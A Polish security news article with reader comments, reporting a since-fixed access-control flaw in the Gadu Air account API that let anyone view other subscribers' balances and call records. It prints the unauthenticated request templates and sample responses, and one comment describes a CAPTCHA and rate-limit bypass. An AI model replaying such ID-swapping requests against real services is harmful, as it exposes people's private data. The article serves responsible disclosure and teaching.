30/11/2010
Jeden z czytelników Niebezpiecznika znalazł błąd w sieci telefonii komórkowej Gadu Air należącej do Gadu-Gadu. Błąd pozwalał dowolnemu internaucie na podgląd billingów dowolnego abonenta Gadu Air — wystarczyło znać numer jego telefonu, lub numer jego GG.
Podgląd billingów w Gadu Air
Oprócz billingów atakujący mógł podejrzeć stan konta i informacje o usługach.
GaduAir
Poniżej wiadomość, jaką otrzymaliśmy od znalazcy błędu:
Błąd występował na serwerze Gadu-Gadu odpowiadającym za API do GG10. W GG10 jako multi-kombajnie dodano wiele opcji, m.in.: sprawdzanie informacji o koncie GaduAIR, do którego wykorzystywane jest API znajdujące się na serwerze ‘konto.nowe.gg’ [tak, .gg to domena ;)].
Serwer odpowiadał na zapytania nawet bez nagłówka HTTP “Authorization”, co umożliwiało dostęp do wrażliwych danych innych użytkowników. Odpowiedzi serwera były zwracane w formacie JSON — na potrzeby prezentacji zostały one poniżej zmienione na bardziej czytelny dla człowieka format.
Sprawdzanie informacji o koncie
Zapytanie:
----------------------------------------------------------------------------------- GET /accountwallets/[NUMER_GG].json HTTP/1.0 Host: konto.nowe.gg From: callpanel to account-api -----------------------------------------------------------------------------------
Odpowiedź:
----------------------------------------------------------------------------------- Array ( [result] => Array ( [wallets] => Array ( [0] => Array ( [_type] => GSMOnNetWallet [amount] => 2.83 [currency] => PLN ) [1] => Array ( [_type] => CashMainWallet [amount] => 1.19 [currency] => PLN ) [2] => Array ( [_type] => PeanutsWallet [amount] => 60 [currency] => GVC ) [3] => Array ( [_type] => ReceiveAndEarn [amount] => 1.14 [currency] => PLN ) ) [status] => 0 ) ) -----------------------------------------------------------------------------------
Sprawdzanie bilingów
Zapytanie:
----------------------------------------------------------------------------------- GET /accounthistory/[NUMER_GG]/BILINGS.json HTTP/1.0 Host: konto.nowe.gg From: callpanel to account-api -----------------------------------------------------------------------------------
Odpowiedź:
-----------------------------------------------------------------------------------
Array
(
[result] => Array
(
[events] => Array
(
[0] => Array
(
[category] => BILINGS
[type] => 111
[type_description] => Połączenie wychodzące GSM
[amount] => 0
[currency] => PLN
[date] => 2010-11-27 13:08:45
[describe] => Z: 0048[xxxxxxxxx] Do: 0048[xxxxxxxxx] Czas: 00:01:05
Zużycie:
Dodatkowe środki bonusowe w sieci: 0.17 pln
)
[1] => Array
(
[category] => BILINGS
[type] => 107
[type_description] => Dane
[amount] => 0
[currency] => PLN
[date] => 2010-11-27 08:35:32
[describe] => Z: 0048[xxxxxxxxx] Kilobajty: 0.72
)
Zużycie:
główne środki: 0.01 pln
[część danych wycięta, historia połączeń zawierała 16 ostatnich akcji]
-----------------------------------------------------------------------------------
Testową ofiarą, na własne życzenie zgodził się zostać SapeR.
Gadu-Gadu poprawia błędy…
Aktualnie błąd został naprawiony i wszystkie odpowiedzi na zapytania bez autoryzacji zwracają:
----------------------------------------------------------------------------------- Array ( [result] => Array ( [errorMsg] => You have no rights to access the resource. [status] => 2 ) ) -----------------------------------------------------------------------------------
…a nasz znalazca wzamian za podesłanie powyższych informacji o błędach, otrzymał od Gadu-Gadu oszałamiającą propozycję:
Jeśli korzysta Pan z GG10 lub NGG Proszę o wybranie sobie 5 opisów graficznych ze strony gadudodatki.pl
Wow! Mają gest, nie? Aż 5 mu dali! Mamy nadzieję, że bezpieczeństwo waszych billingów w sieci Gadu Air jest jednak odrobinę cenniejsze… ;-)
Aktualizacja 2 grudnia 2010
Po 2 dniach Gadu-Gadu zreflektowało się (wierzymy, że samo z siebie, a nie dzięki naszej publikacji…). Znalazca błędu otrzymał następującego e-maila:
Najpierw chciałbym podziękować Panu za szybką reakcję na luki w naszym systemie. Jednak wczorajsze, bardzo pospieszne podziękowanie ze strony suportu …moim zdaniem było zbyt skromne. Zdaję sobie sprawę, że gdyby nie Pana interwencja, mogło by wyciec sporo danych do osób niepowołanych.
Proponuję ze swojej strony, jako pewną rekompensatę, złoty numer GaduAIR ( + oczywiście doładuję go stosowną kwotą).
Czy taka forma podziękowania ze strony GaduAIR będzie dla Pana satysfakcjonująca? Jeśli ma Pan inny pomysł to jesteśmy oczywiście otwarci na sugestie. Pozdrawiam i czekam na sygnał z Pana strony ;)
Dariusz Wałach
Dział Public Relations
Cieszymy się, że Gadu-Gadu przypadła do gustu proponowana przez jednego z naszych komentujących forma wynagrodzenia znalazcy błędu. Jak widać, “da się”!
P.S. Wygląda na to, że kontunuujemy czarny listopad polskich firm: do dużych firm z dużymi błędami. Do Allegro, Plus GSM, mBank) dołącza Gadu-Gadu… kto będzie następny? Jeszcze mamy kilka godzin do końca miesiąca…
Weź udział z kolegami w jednym z naszych 8 cyberwykładów. Wiedzę podajemy z humorem i w przystępny dla każdego pracownika sposób. Zdalnie lub u Ciebie w firmie. Kliknij tu i zobacz opisy wykładów!
Każdy powinien zobaczyć te webinary! Praktyczna wiedza i zrozumiały język. 6 topowych tematów — kliknij tutaj i zobacz szczegółowe opisy oraz darmowy webinar.
niech sie cieszy ze go nie pozwali ;D
Powinien dostać 10tys złotych, a nie 5 badziewnych opisów GG -.-, albo dożywotnią licencje na ProGG.
Zadziwiacie mnie z dnia na dzień ;]
Te wszystkie wtopy to zorganizowana przez GIODO akcja ktore w ten sposob wola o wiekszy budzet ;-)
Ta czarna seria potwierdza tylko to jak ważne są testy aplikacji… Odpowiedź GG potwierdza z kolei fakt, że polskie firmy uważają, iż na testy nie powinno się przeznaczać znacznego budżetu. Oby taniej, oby taniej..
A efekty widać.
Mocna nagroda. Jak za takie coś można zaproponować jakieś słitaśne opisy graficzne? :-) Przecież to od razu opisuje ludzie, którzy tam pracują. Dobrze, że jest WTW. Niech się ludzie przerzucą w końcu na coś innego niż te GG, bo to porażka. Jabber jest przecież spoko. Te GG trzymam tylko i wyłącznie dlatego, że moi znajomi z tego korzystają, ale bardzo dobrze, że coraz więcej osób się przesiada ;)
Nie no bez przesady, 10k? Google daje $500 bodajże. Ogólnie, mogliby mu dać po prostu numer z ich `złotej listy numerów` z kontem napompowanym do 500/1000zł i by było fair.
Też mam GaduAir :P Ciekawe ile jeszcze dziur ma w sobie GG…
Hmm, jeszcze niebezpiecznik sie wysypie dziś ;D
Faktycznie, nagroda powala – szkoda, że mu nie dali albumu ze wszystkimi archiwalnymi wersjami klienta GG na płytkach. ;] Także uważam, że powinni się odwdzięczyć finansowo – w końcu TAKI błąd jest dosyć poważny a TAKA kasa, jaka została wspomniana w komentarzu @masterr’a to dla całej firmy ŻADNA kasa.
Gdyby nie to że wszyscy znajomi mają konta GG a tylko nieliczni używają innych komunikatorów… Dla mnie cała platforma GG to szit – powstała ze zlepków różnych rzeczy napisanych dla funu chyba :P jeśli chodzi o kombajn GG10, to wolę jednak Kadu – proste i skuteczne.
@Damian
Google daje od $500 do $3133,7, w zależności od tego jak poważny jest błąd (szczegóły: http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html).
A $3133,7 to mniej więcej 10k PLN ;)
Hehehe Piotrku może nie wywoluj wilka z lasu :) pozniej na wikileaks bedzie nasz kraj popularniejszy :)
Dyshoo, a co Ci odpisali ja im napisałeś że nie satysfakcjonuje Cię nagroda?
hahha rozwalila mnie ta nagroda xD
kolejny http://wyborcza.biz/finanse/1,105684,8742875,Nie_dziala_strona_banku_ING__Klienci_w_Moze_stalo.html
Zawsze wiedziałem że wszystko związane z GG to sheet, ale teraz to już po prostu błazenada. Każda szanująca się firma dała by spora nagrodę pieniężną za taki błąd, a oni dają opisy graficzne!? I oni chcą żeby byli traktowani poważnie.
dobrze że mu konta w ING nie założyli ,bo dziś następny bank padł ,pewnie go zasypało
@Dejvus
Czy mógłbyś wymienić szanujące się firmy które dałyby sporą nagrodę pieniężną za taki bug?
Prawdę mówiąc, z tego co znam rynek, to firm które dają cokolwiek za bug jest baaaardzooo mało, a to, że firma jest “szanująca się” nie znaczy jeszcze, że daje kasę za bugi.
@Gynvael Coldwind
Google, Mozilla…
Google dało by co najmniej 500$, co już traktuję jako przyzwoitą sumkę. Ale GG Network mogło by mu dać chociaż 200zł, a nie takie [Cenzura].
Niestety zgadzam się ze zdaniem Gynvaela. W Polsce panuje pogląd, że najlepszą nagrodą jest fakt, że firma nie złożyła pozwu.
Z drugiej strony, pomyślmy co by się stało gdyby zapłacili dużo jednemu. Najprawdopodobniej znalazłyby się dziesiątki (^n) ludzi liczących na łatwy zarobek, a co za tym idzie zwielokrotnienie nakładów potrzebnych na ochronę i administrację nią (no, przynajmniej zatrudnienie jednej osoby) – taka moja idealistyczna wizja, że się firmy troszczą o swe bezpieczeństwo.
Z jednej strony uważam zachowanie GG za potwarz, a z drugiej… Ja dostałem tylko lakoniczne podziękowanie kiedy zgłosiłem pewnej szanującej się firmie w branży internetowej, że mają XSS w wyszukiwarce. A i na te podziękowania czekać musiałem długo bez żadnego odzewu.
Podałem za i przeciw i wychodzi na to, że potrzebny jest jakiś złoty środek i rozwaga…
PS: Typujemy kto zafunduje nam następną wpadkę? ;-) Może Niebezpiecznik ankietę wstawi?
Mają gest:)
Zawsze zamiast kasy można dać np. jakiś fajny gadżet, coś co nie każdy może mieć. Ale 5 opisów graficznych, które są po 2.44pln chyba? To by mu już lepiej czteropak wysłali czy coś :)
P.S. Wygląda na to, że kontunuujemy czarny listopad polskich firm: do dużych firm z dużymi błędami. Do Allegro, Plus GSM, mBank) dołącza Gadu-Gadu… kto będzie następny? Jeszcze mamy kilka godzin do końca miesiąca…
ING? :P
http://biznes.onet.pl/kolejna-awaria-w-duzym-banku,18543,4012331,1,news-detal
@Dejvus
Czyli “Każda szanująca się firma” == { Google, Mozilla } ? Hehe :)
Nie no, nie oszukujmy się, mało która firma (nawet wśród szanujących się firm) płaci za bugi czymś więcej niż podziękowaniami w changelogu / na liście mejlingowej / w mejlu.
M.in. dlatego powstała inicjatywa No More Free Bugs.
Jak @dotnokato słusznie zauważył, w Polsce niezłą nagrodą jest już to, że firma nie złożyła pozwu (a zdarzały się takie przypadki).
Cóż, są argumenty zarówno za płaceniem za bugi (np. “praca została wykonana”) jak i przeciwko niemu (“ale nie była to praca zamówiona / nie było na nią zgody”)…
Gratuluję nagrody: dla sweetaśnych nastolatek od równych poziomem. :D
Będę pamiętał, że jeśli znajdę coś w GG, to nigdy im nie zgłaszać, co najwyżej Niebezpiecznikowi ;)
Tu nie chodzi o kwotę (jakby rzucili doładowanie 10 zł to już jest coś godnego) – ale oni rzucili żałosne opisy graficzne. Czy oni uważają, że człowiek który potrafi znaleźć taki błąd jest 13-letnim pokemonem i ustawia to badziewie, z którego i tak nie ma pożytku?
Opisy graficzne są warte od 1 zł do 3 zł. Jakby mu dali od 5 do 15 zł na konto to by sobie chociaż wydał na co chce w ich sklepie.
WSTYD! Ta spółka uważa każdego za idiotę albo pokemona.
ING? http://interaktywnie.com/biznes/newsy/bezpieczenstwo/kolejna-awaria-banku-tym-razem-ing-18335
Ale wstyd… Kazałbym im sobie wsadzić te ich 5 opisów graficznych. Jakieś darmowe doładowanie to rozumiem. Ale to? Żart i upokorzenie…
no i jest następny – ING
Jak kiedyś znalazłem i zgłosiłem błąd w jednym z polskich banków, to dostałem list z podziękowaniami za znalezienie “poważnego błędu” i upominek, którym był… długopis z logo banku. Niedziałający. To jest dopiero szacunek. ;-)
Choć z innego przysłali karton gadżetów, więc to nie jest reguła… ;-)
plotki mnie wlasnie doszly o wtopie ING?
Pięć opisów graficznych?!?! – Dobra nie ma co tu siedzieć, idę szukać błędów w GG, taka okazja nie może mnie ominąć!!
Niedługo to nasza-klasa padnie (co nawet popieram) , na interii będzie błąd (co nie popieram) ,a Niebezpiecznik będzie miał więcej postów H@H@ :D
@Kenobi: ktoś znalazł jakiś bug w NK (podobno, bo na razie nie mamy czasu żeby przetestować)…
ING tez wtope zaliczylo :)
http://error.ing.pl/serwis-chwilowo-niedostepny
http://www.ingbank.pl/indywidualni/bankowosc-elektroniczna/ing-bankonline#tab=1 wybierzcie zaloguj – i zonk
podobno bankomaty w calym kraju padly :D
Pozdro
Co do płacenia za błędy, to ja już wolałbym, żeby mi nie zapłacili, a podziękowali, a nie dawali tak od niechcenia jakies tandetne opisy. Czy oni naprawdę myślą, że pentester jest na tym poziomie?
Jesteście już na wykopie http://www.wykop.pl/link/540769/powazny-blad-w-gadu-gadu-i-gadu-air/
“kto będzie następny? Jeszcze mamy kilka godzin do końca miesiąca…” w sumie to jakieś pół godziny temu problemy techniczne miał ING, po zalogowaniu i próbie wykonania przelewu dostawałem komunikat “sesja wygasła, zaloguj się ponownie” sprawdzałem na dwóch niezależnych kontach i było tak samo, chwilę później na stronie logowania ING wisiał komunikat że są problemy techniczne :). A do końca miesiąca jeszcze kilka godzin zostało tak jak napisaliście ;)
PS. ING już działa
Piotr Konieczny : taa , słyszałem o tym :D (a nawet zaraz się pobawię na nk ;ss)
napisaliby mu “dzięki stary, jesteś awesome” i byłoby fajnie, a wychodząc z taką żałosną propozycją tylko się ośmieszają..
Nawet daliby mu te 100 zł ,a nie… Sami się ośmieszyli.
Ja bym się najbardziej ucieszył z oferty pracy. I pewnie nie tylko ja…
Jest nauczka – następnym razem nie zgłaszać buga firmie, tylko do razu do GIODO. Wtedy firma zapłaci “nagrodę” :)
Typowy błąd kontroli dostępu do danych. OWASP Top10: 2010-A4-Insecure Direct Object References (http://www.owasp.org/index.php/Top_10_2010-A4). Tego typu błędów jest niestety bardzo, bardzo dużo w aplikacjach internetowych. Zawsze, gdy pojawia się coś w rodzaju identyfikatora globalnego (w tym przypadku – numer telefonu) w trakcie testów trzeba sprawdzić co się stanie, gdy podany zostanie identyfikator należący do innego użytkownika. Druga sprawa – raczej nie należy stosować tego typu identyfikatorów globalnych. Lepszą praktyką jest stosowanie odwołań pośrednich, ważnych tylko w kontekście sesji użytkownika i jego danych.
Bierz:
-Tajemnicza
-Kocham i jestem kochana
-Krejzolka
-Wymiatacz
-Nudzi mi sie
;))
Dobra, to je też napiszę o tych ‘opisach graficznych’ – szczerze mówiąc, to wolałbym ‘Dziękuję’ i wzmiankę w newsie niż taki wirtualny badziew. Serio…
Tu już nawet nie chodzi o kasę (10k PLN ? u nas w kraju ? wolne żarty…) czy jakieś ‘gratisy’ – firma GG pokazała co należy robić z wykrytymi w przyszłości błędami…
Hmm co do ING to już zaliczył podobną wtopę jakiś miesiąc temu. Padła wersja online, wszystkie bankomaty, właściwie wszystkie systemy – nawet osobiście nie można było niczego załatwić.
Dzięki i wzmianka w czeńdżlogu byłaby znacznie lepsza.
Z drugiej strony brak procesu o “przełamywanie zabezpieczeń” i graficzne opisy też są spoko.
W tym przypadku nie można mówić o przełamywaniu zabezpieczeń, bo takowych nie było w ogóle.
Sayene: osoba, ktora znalazla ten blad wcale nie musiala przelamywac zabezpieczen, w polskim prawie komputerowym jest rowniez mowa o zapoznaniu sie z informacja dla niego nieprzeznaczona.
Moim zdaniem wystarczyloby zwykle dziekuje, w koncu jak napisal gyn, nie ma obowiazku wynagradzania/placenia za znalezione przypadkiem bledy (choć jest to miła praktyka). Pentester, który submituje błędy licząc tylko na $$$ jest wątpliwej natury moralnej.
@Sayane
Jeżeli ktoś zrobi logowanie w js, bardzo prosty błąd typu mysqli, czy trzyma dane w głębokim ukryciu a nawet w dupie, i wydobycie danych jest traktowane jak przełamywanie zabezpieczeń to czemu niby tu miałoby nie być?
Ostatnimi czasy buszowałem po sieci w poszukiwaniu kilku aktów prawnych związanych m.in ze spamem. Trafiłem na portal, który w nazwie ma prawo po łacinie. Wszystko byłoby pięknie gdyby nie fakt, że po wpisaniu w wyszukiwarkę na ichniej stronie moim oczom nie ukazał się piękny widok. Pełne zapytanie wysłane do bazy, wraz ze strukturą bazy, i takimi tam pierdołami. (Nie)(S|s)tety bez loginu, hasła i hosta bazy. Ale jako porządny obywatel zgłosiłem to ichniemu webmajstrowi czy do kogo tam maila znalazłem. Wynik? Na drugi dzień wieczorem wyszukiwarka działała prawidłowo a ja nawet głupiego dziękujemy na maila nie dostałem.
No cóż, różnie to bywa, jedni wola sprawę przemilczeć, inni wytoczyć proces, a jeszcze inni dać graficzne opisy ;)
apropos błędów, wpadkę zaliczyła również firma kurierska dpd, od 29,11 nie monitorują przesyłek w sortowniach(lub nie aktualizują ich statusów na www). Paczka idzie 3ci dzień, wg statusu kurier odebrał ją od klienta i jeszcze nie dostarczył do sortowni.;D
Pani z infolinii, z którą rozmawiałem wieczorem stwierdziła, że to niemożliwe, na pewno paczuszka już w domu czeka, aż wrócę z pracy i przeprasza za opóźnienia jednak to nie ich, a pogody wina.
O ile pogodę mogę zrozumieć to paczki nie dostałem do dziś. Nadal ma status utworzono kwit, odebrano od klienta, brak wpisu o “wejściu” do sortowni.
Ciekaw jestem czy ktoś jeszcze ma takie problemy. Widać black monday nie tylko w USA i nie tylko w kategorii zwiększonego e-handlu. ;)
Pozdrawiam
Czyżby ktoś z dpd Was czytał?:P Po opublikowaniu postu znalazła się nagle historia mojej paczki. ;p
-nadawca utworzył kwit
-kurier odebrał od klienta
-paczka nie weszła do lokalnej sortowni
-po 2 dniach paczka znalazła się u mnie w sortowni
– nie wiadomo co się z nią działo przez te 2 dni :P
Nadal pozostaje fakt dziwnego zbiegu okoliczności i “padów polskich systemów” niemal w tym samym czasie.
Ja zglosilem ze 2 lata temu do NASKu bug w WHOISie webowym (puszczenie odpowiedniego POSTa omijajacego captche), podziekowali, naprawili, po 2 dniach okazalo sie, ze trzeba puscic troche innego POSTa i znow omija sie captche, podziekowali, i napisali “Prosze podac adres, to wyslemy upominek-niespodzianke”, niestety nawet dlugopisu nie znalazlem w skrzynce :) Po miesiacu uruchomili na powrot (po jakis 1-3 lat przestoju) usluge whois na porcie 43 z limitami zapytan, ktore rowniez obszedlem (losowe znaki w useragent za kazdym razem inne), a nawet nie odpisali na maila (blad chyba naprawili).
Teraz już wiem dlaczego Gadu-gadu non stop szuka jakichś pracowników na serwisach z ofertami pracy – oni po prostu płacą im graficznymi opisami i brak chętnych! :-)
Ale jeszcze lepszy bug w GG. Od jakiegoś czasu ojciec, który długo nie używał Gadu-Gadu a teraz zaczął skarżył mi się, że chyba ktoś korzysta z jego numeru. Bo jakaś małolata zmiania mu avatar i co on sobie ustawi swój to za kilka dni jest znowu jej. Pomyślałem, że może coś mu się pomieszało, ale dzisiaj się dowiedziałem, że koleżanka ma ten sam problem, też długo nie korzystała i jakiś czas temu zaczęła i ma tak, że ją rozłącza jakby ktoś wchodził na jej numer. Albo jej wyskakuje komunikat, że ktoś jest już zalogowany, zmieniła hasło i problem się nadal powtarza.
@macnow
a w tej bajce były smoki?
@Szczygiel też nie mogłem w to uwierzyć, ale dzisiaj (30 minut temu) ojciec (a nie mówiłem mu o tym, że ten problem miała koleżanka) podczas rozmowy telefonicznej ze mną otrzymał komunikat, że zalogowano się na jego konto z innego komputera.
@Szczygiel, widocznie jesteśmy w tej bajce ze smokami.
Nie dalej jak dwa dni temu sam byłem świadkiem, jak małoletniemu znajomemu jego inny kumpel wbił na GG i pisali razem z jednego numeru, co dość schizowo wyglądało – jakby mój rozmówca miał rozdwojenie jaźni. Ów domorosły hakier napisał później do mnie, że korzysta z jakiegoś softu, co to daje możliwość wejścia komuś na GG znając tylko jego numer (zaliczyłem rotlfa, gdy grzecznie zapytał, czy może wejść na moje GGowe konto). Hasło jest zbędne. Nie wiem, na ile to prawda, nie znam się na tym, ale przecież przebieg rozmowy z zaatakowanym pokazywał jednoznacznie, że ktoś inny, w tym samym czasie, korzysta z jego numeru. A ikonki w oknie rozmowy wskazywały, że to wciąż “ten sam użytkownik”.
Ehm… nie czepiajcie się tych “ikonek w oknie rozmowy”. Sam zdałem sobie sprawę, jak w tym momencie pokazałem, że nie jestem “z tej branży” ;/
Trafiliście na główną wp :) http://tech.wp.pl/kat,1009781,title,Powazny-blad-w-Gadu-Gadu-i-Gadu-Air,wid,12905562,wiadomosc.html z tytułem na głównej “Używasz Gadu-Gadu? Koniecznie to przeczytaj! ” Straszeniu mówimy stanowcze nie, ale że w sumie po fakcie może to co poniektórych obudzi i poszukają alternatywy :)
… ja dzwoniądz (i z konta; i za darmo) nie słyszę rozmówcy, a on mnie słyszy; nikt nie umie tego wytłumaczyć i przywrócić poprzedni stan; fachowcy z GG nie chcą zwrócić mojej kasy z konta; możecie pomóc ???
[…] zrealizowana w sposób konsekwentny i prawidłowy, może się to skończyć takimi informacjami: Poważny błąd w Gadu-Gadu i Gadu Air. Krótki […]
#wes59
Włącz głośniki, zmień słuchawki, sprawdź na innym kompie…
http://tech.wp.pl/kat,1009781,title,Powazny-blad-w-Gadu-Gadu-i-Gadu-Air,wid,12905562,wiadomosc.html –> Gratulę. Macie już niezłą markę w necie. Trzymajcie tak dalej….
macnow, to jest ciekawa rzecz o której piszesz… mi się niedawno udało przypadkiem wbić jednocześnie z dwóch kompów z ekg2 na jeden nr gg. normalna sytuacja jest taka, że gdy drugi się łączy to pierwszy rozłącza. teraz nie rozłączał. natomiast co było bardzo ciekawe to to, że wiadomości wysłane na ten numer dochodziły jednocześnie do obydwu klientów. nie wiem co to za bag czy tam ficzer, ale nie wyglądało to ciekawie.
inna ciekawa rzecz – na tym numerze gg czasami przez cały dzień co chwilę zrywa mi połączenie. równolegle chodzący drugi numer działa normalnie. robiłem testy wysyłania wiadomości na ten numer zaraz po rozłączeniu i nie zauważyłem żadnych nieprawidłowości typu znikające wiadomości.
@socrtp, ficzer -> http://gadunews.pl/news.php?readmore=374
@Qrix – dzięki za info! piękna sprawa – teraz można komuś wejść na konto całkowicie niepostrzeżenie. niech żyje GG ;)
W ostatnim akapicie powinno raczej znaleźć się słowo “kontynuujemy” zamiast “kontunuujemy”.
[…] Przypomnijmy, że kilka tygodni temu opisywaliśmy podobny błąd w telefonii Gadu Gadu, czyli Gadu Air – por. poważny bład w Gadu-Air […]
[…] wbrew pozorom, nie zapłacimy Ci opisami graficznymi — my preferujemy złotówki […]
Ja też korzystam z jabbera i jest całkiem dobry.
Jest nawet lepszy niż gg, bo można się kontaktować przez niezależnie od tego z jakiego serwera jabber ktoś korzysta i niezależnie od aplikacji.Ja mam aqq.eu i mogę się łączyć nawet z tlen.pl czy z gmail.com .
Sorka, że odgrzebuje bardzo stary news, ale nie mogłem się powstrzymać – wybaczcie :P
Z tego co się orientuję Apple banuje na liście developerów / sklepu takiego osobnika, zamiast wynagrodzić znaleziony błąd i zwyczajnie…”zamiata pod dywan”. Zatem GG chyba nieco lepiej potraktowało ‘klienta’, nieprawdaż? :)